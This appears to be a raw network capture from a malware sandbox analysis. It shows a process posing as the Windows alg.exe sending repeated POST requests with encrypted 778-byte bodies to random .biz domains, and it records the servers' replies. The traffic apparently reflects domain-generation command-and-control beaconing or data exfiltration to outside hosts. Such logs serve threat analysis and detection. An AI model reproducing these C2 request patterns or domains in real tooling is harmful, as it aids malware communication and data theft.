                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:43.556391954 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=84e9956587e46d92280dcd646c425502|155.94.241.188|1730129923|1730129923|0|1|0; path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        72192.168.2.4500243.94.10.34806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:43.577054024 CET348OUTPOST /dpop HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: ctdtgwag.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:43.577071905 CET778OUTData Raw: e3 36 54 a9 d1 50 9c 4f fe 02 00 00 c2 a7 bd 9d 86 2d 9b 41 52 35 e6 f0 46 6d 72 a4 7d e6 56 54 93 d9 c6 4b c1 cb f6 a5 29 e9 84 2c 81 6b d7 3d 16 55 66 d0 31 a6 72 08 c7 f5 34 58 5a d3 15 37 be b7 4d 1c 18 cc 28 a5 c1 d9 d4 65 4b 8b 15 27 5a f0
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 6TPO-AR5Fmr}VTK),k=Uf1r4XZ7M(eK'ZF8RFYEXI],5?^.['8dL~(!RX;M8w401'oEz]c3sQ.zA7hCs]d+[^$9m[;d
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:44.643255949 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=80bf27f9768f939b7205755ced2b60d9|155.94.241.188|1730129924|1730129924|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        73192.168.2.45002935.164.78.200806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:44.753194094 CET360OUTPOST /awkwgthegytbtgpc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: tnevuluw.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:44.753222942 CET778OUTData Raw: 1f 2d 52 64 60 c4 c5 ab fe 02 00 00 8a ec b6 06 90 cb 6c ad 75 91 5a 6c 9e 3c e9 1c e9 92 f0 7d 99 a2 04 3c 6e 77 b7 ef f1 a2 1f 0a 07 9e 8b 32 48 09 2a 51 4d f9 08 9b 36 5b 55 0c 26 3e 36 03 1e 48 d0 53 1c f7 f1 bc 0c fb 46 6b 0f fe b2 86 fd 49
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: -Rd`luZl<}<nw2H*QM6[U&>6HSFkI0;BZ~cp~`:A^?"chY{D_=RZu-*\d'8Z8OIh`Fe_u7VUO$[O#(D*nb3$8GT)
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.165713072 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=e86a0e947e11ed5996878d887896ce71|155.94.241.188|1730129925|1730129925|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        74192.168.2.45003218.141.10.107806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.185539961 CET345OUTPOST /gcp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:46.185564995 CET778OUTData Raw: c2 65 15 68 b6 ac 1e f8 fe 02 00 00 22 24 47 a2 62 35 55 c5 fd 6d 7d 00 47 6c 23 5e 72 04 79 b9 5f e3 b6 ce f5 5d ea 94 4a 08 6f 9c 61 f8 2b 67 30 9d 61 7c 63 02 6b 31 3f f0 6b 24 77 c8 64 46 40 f0 88 46 14 5a 3d ce 22 19 fc c0 ab af 84 0d 49 99
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: eh"$Gb5Um}Gl#^ry_]Joa+g0a|ck1?k$wdF@FZ="I&H}uK)$d5k)sf"fAmdqd4kC[X>)7T#)+7BO^zU-UiC`b*SU[t~WSK`\:e2q`Je.{8fN{V0x^
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.623069048 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=5017ff9ab6e2fb30b0908190f7b96481|155.94.241.188|1730129927|1730129927|0|1|0; path=/; domain=.whjovd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        75192.168.2.450041208.100.26.245806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.644360065 CET349OUTPOST /aucs HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:47.644376040 CET778OUTData Raw: 93 6b cc 63 1f 52 ae 2f fe 02 00 00 aa 22 12 53 d7 22 34 c7 04 4d ab fe d5 d2 4d ff d7 e5 85 01 1a 64 27 97 6f b9 cf 01 f1 0a 97 79 aa fe 9b a8 52 73 4a d8 d7 c5 95 bb ad 4c a9 3b cf b2 56 34 18 1b 73 4f d4 b6 c5 bc 22 ed 40 26 75 72 c0 24 3e 72
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: kcR/"S"4MMd'oyRsJL;V4sO"@&ur$>rFI#M6C5O4v:OaY=:IpDr>cb-k \WpHd8[.6Gl&ts8XHR<<(6+)l,MLdIw[RXo/;X
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.338663101 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.342329979 CET354OUTPOST /yvsxvdpyb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.342377901 CET778OUTData Raw: cc b1 47 a6 51 6e 6e 58 fe 02 00 00 83 bf 8f 4a ef 6f 74 e8 27 ec e1 79 95 9d f6 b8 0b cb d9 fc 56 63 7b cc e4 83 a4 2d cc c4 d0 ca dc bb 32 f5 c9 22 dc 69 09 80 c9 14 bb 9e c1 81 18 cf 86 ba d5 9b 70 e3 1b 8c 75 d3 cb 7e b9 18 39 b8 8f fc 84 91
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: GQnnXJot'yVc{-2"ipu~9B0t2vO4*<5u7B#+rC:1n)ys+>y$BTb{HZ@g6s$2.;YG'{/fO4FGt9PA+Nxvp(
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.486805916 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        76192.168.2.45005244.221.84.105806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.508557081 CET345OUTPOST /iq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: reczwga.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:49.508579969 CET778OUTData Raw: 15 e7 9f 1a 32 02 35 e3 fe 02 00 00 2c 80 4a da 0b 7f 28 79 da 8e 33 d9 6d 43 79 47 98 00 b8 59 b1 16 70 49 9f bf da f1 83 80 fb cf 6b 3e 62 93 e9 5b 39 bf 7c 0f 91 d7 b7 6e 0a 34 1e 63 cb 46 f3 60 38 96 d3 44 3b b7 d8 12 a2 18 35 fa d2 f8 f9 ef
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 25,J(y3mCyGYpIk>b[9|n4cF`8D;5oyE2)2w-z#N\cL~E_"22rqp/P9P9k&W%3`hD<(a$~?Xs=*s3Z=(_I4mY6}hsF/}j|
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.453974009 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=4425a3538f13a832d1abd26472e6f75a|155.94.241.188|1730129930|1730129930|0|1|0; path=/; domain=.reczwga.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.457695007 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=4425a3538f13a832d1abd26472e6f75a|155.94.241.188|1730129930|1730129930|0|1|0; path=/; domain=.reczwga.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        77192.168.2.45005734.211.97.45806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.485996962 CET352OUTPOST /tqiopufncd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: bghjpy.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:50.486031055 CET778OUTData Raw: b9 b8 e3 60 9e af 4b 7b fe 02 00 00 db e9 e1 5e 04 88 8c 14 44 4a 10 8f dc 95 50 1c e0 8b c5 65 e2 a3 ac 7c a4 fd 61 ac ad cd 80 2d da f6 9d 08 6a 05 50 ac 24 90 8f 25 a0 98 f0 8c 26 2a 27 b0 b8 f9 d4 b6 f2 cd 8c 93 3c 6d f1 c5 b5 a8 e9 fd 43 ed
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: `K{^DJPe|a-jP$%&*'<mCiQw5uq<36[}XGD8ovl(KP}1Uy"@RT-_m{QixiS]y@{LN/T$wc!>{t9gwRl?{n
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.313765049 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d32f7546153f0d8c2bd8b5d70e2ffcc0|155.94.241.188|1730129931|1730129931|0|1|0; path=/; domain=.bghjpy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        78192.168.2.45006218.208.156.248806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.337209940 CET347OUTPOST /fv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: damcprvgv.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.337222099 CET778OUTData Raw: f5 57 e0 65 ea d2 a2 c8 fe 02 00 00 f6 ca 11 d0 6e 09 cc 4d 62 98 8a 1a 08 43 00 0c 37 97 75 25 53 f4 2e ab 04 18 f8 f5 b5 32 b3 b6 4d bf 77 88 6b 17 e4 8a 7b 64 d3 4d e9 b3 8a 02 cd d9 65 0e 0c 8d 2e 9e ef 79 a1 ed d9 2d 25 5d 87 e2 0f a5 ad b4
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: WenMbC7u%S.2Mwk{dMe.y-%]f-gujt^OV?7:)+"em$,a~V3A@Ab1vOn I~MElTE&lptIqk/=<8?/3^@4XqwIE7
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:51.992820024 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=161b0732f45e0a405f891efa0cb20c0f|155.94.241.188|1730129931|1730129931|0|1|0; path=/; domain=.damcprvgv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        79192.168.2.4500683.254.94.185806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:52.119317055 CET346OUTPOST /cly HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: ocsvqjg.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
